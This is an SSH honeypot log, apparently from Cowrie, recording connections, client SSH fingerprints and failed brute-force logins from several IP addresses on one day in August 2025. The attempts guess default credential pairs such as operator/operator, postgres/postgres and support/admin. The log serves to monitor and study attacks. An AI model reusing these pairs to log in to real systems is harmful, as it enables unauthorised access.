{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61914,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcf1b9d62f8c","protocol":"ssh","message":"New connection: 212.227.235.229:61914 (1.2.3.4:22) [session: dcf1b9d62f8c]","sensor":"my-vps","timestamp":"2025-08-28T00:54:33.853153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T00:54:33.854048Z","src_ip":"212.227.235.229","session":"dcf1b9d62f8c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T00:54:33.993279Z","src_ip":"212.227.235.229","session":"dcf1b9d62f8c"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie","message":"login attempt [macie/macie] failed","sensor":"my-vps","timestamp":"2025-08-28T00:54:34.616160Z","src_ip":"212.227.235.229","session":"dcf1b9d62f8c"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie1","message":"login attempt [macie/macie1] failed","sensor":"my-vps","timestamp":"2025-08-28T00:54:35.750456Z","src_ip":"212.227.235.229","session":"dcf1b9d62f8c"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie123","message":"login attempt [macie/macie123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:54:36.894342Z","src_ip":"212.227.235.229","session":"dcf1b9d62f8c"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie1234","message":"login attempt [macie/macie1234] failed","sensor":"my-vps","timestamp":"2025-08-28T00:54:38.028313Z","src_ip":"212.227.235.229","session":"dcf1b9d62f8c"}
{"eventid":"cowrie.login.failed","username":"macie","password":"macie12345","message":"login attempt [macie/macie12345] failed","sensor":"my-vps","timestamp":"2025-08-28T00:54:39.163880Z","src_ip":"212.227.235.229","session":"dcf1b9d62f8c"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:54:40.299196Z","src_ip":"212.227.235.229","session":"dcf1b9d62f8c"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:54:41.566433Z","src_ip":"212.227.235.229","session":"0b11590c7763"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53556,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fb210d0b8b5","protocol":"ssh","message":"New connection: 212.227.235.229:53556 (1.2.3.4:22) [session: 7fb210d0b8b5]","sensor":"my-vps","timestamp":"2025-08-28T00:54:44.577601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:54:44.578467Z","src_ip":"212.227.235.229","session":"7fb210d0b8b5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T00:54:44.757610Z","src_ip":"212.227.235.229","session":"7fb210d0b8b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53570,"dst_ip":"1.2.3.4","dst_port":22,"session":"28717fbbd94d","protocol":"ssh","message":"New connection: 212.227.235.229:53570 (1.2.3.4:22) [session: 28717fbbd94d]","sensor":"my-vps","timestamp":"2025-08-28T00:54:45.283834Z"}
{"eventid":"cowrie.client.version","version":"MGLNDD_212.227.235.229_22","message":"Remote SSH version: MGLNDD_212.227.235.229_22","sensor":"my-vps","timestamp":"2025-08-28T00:54:45.284699Z","src_ip":"212.227.235.229","session":"28717fbbd94d"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:54:45.285811Z","src_ip":"212.227.235.229","session":"28717fbbd94d"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:54:54.577944Z","src_ip":"212.227.235.229","session":"7fb210d0b8b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60314,"dst_ip":"1.2.3.4","dst_port":22,"session":"84b9ca614088","protocol":"ssh","message":"New connection: 212.227.125.160:60314 (1.2.3.4:22) [session: 84b9ca614088]","sensor":"my-vps","timestamp":"2025-08-28T00:55:32.781233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:55:32.817110Z","src_ip":"212.227.125.160","session":"84b9ca614088"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:55:45.250512Z","src_ip":"212.227.125.160","session":"84b9ca614088"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator","message":"login attempt [operator/operator] failed","sensor":"my-vps","timestamp":"2025-08-28T00:55:46.001737Z","src_ip":"212.227.125.160","session":"84b9ca614088"}
{"eventid":"cowrie.session.closed","duration":"14.5","message":"Connection lost after 14.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:55:47.281974Z","src_ip":"212.227.125.160","session":"84b9ca614088"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":39094,"dst_ip":"1.2.3.4","dst_port":22,"session":"edba14fda838","protocol":"ssh","message":"New connection: 194.233.79.134:39094 (1.2.3.4:22) [session: edba14fda838]","sensor":"my-vps","timestamp":"2025-08-28T00:55:56.991962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:55:57.372256Z","src_ip":"194.233.79.134","session":"edba14fda838"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:55:57.373982Z","src_ip":"194.233.79.134","session":"edba14fda838"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52142,"dst_ip":"1.2.3.4","dst_port":22,"session":"56f2d2fd225c","protocol":"ssh","message":"New connection: 212.227.125.160:52142 (1.2.3.4:22) [session: 56f2d2fd225c]","sensor":"my-vps","timestamp":"2025-08-28T00:55:57.438223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:55:57.451992Z","src_ip":"212.227.125.160","session":"56f2d2fd225c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:55:57.683093Z","src_ip":"212.227.125.160","session":"56f2d2fd225c"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-28T00:55:58.238962Z","src_ip":"194.233.79.134","session":"edba14fda838"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:56:00.507050Z","src_ip":"194.233.79.134","session":"edba14fda838"}
{"eventid":"cowrie.login.failed","username":"support","password":"admin","message":"login attempt [support/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T00:56:01.995897Z","src_ip":"212.227.125.160","session":"56f2d2fd225c"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:56:04.863336Z","src_ip":"212.227.125.160","session":"56f2d2fd225c"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":45572,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa5b8bb3a6c5","protocol":"ssh","message":"New connection: 171.243.151.203:45572 (1.2.3.4:22) [session: fa5b8bb3a6c5]","sensor":"my-vps","timestamp":"2025-08-28T00:57:15.477427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:57:15.478393Z","src_ip":"171.243.151.203","session":"fa5b8bb3a6c5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:57:15.689564Z","src_ip":"171.243.151.203","session":"fa5b8bb3a6c5"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator","message":"login attempt [operator/operator] failed","sensor":"my-vps","timestamp":"2025-08-28T00:57:17.083090Z","src_ip":"171.243.151.203","session":"fa5b8bb3a6c5"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:57:18.576729Z","src_ip":"171.243.151.203","session":"fa5b8bb3a6c5"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":45588,"dst_ip":"1.2.3.4","dst_port":22,"session":"d831988f2971","protocol":"ssh","message":"New connection: 171.243.150.245:45588 (1.2.3.4:22) [session: d831988f2971]","sensor":"my-vps","timestamp":"2025-08-28T00:57:26.746847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:57:26.752441Z","src_ip":"171.243.150.245","session":"d831988f2971"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:57:32.225747Z","src_ip":"171.243.150.245","session":"d831988f2971"}
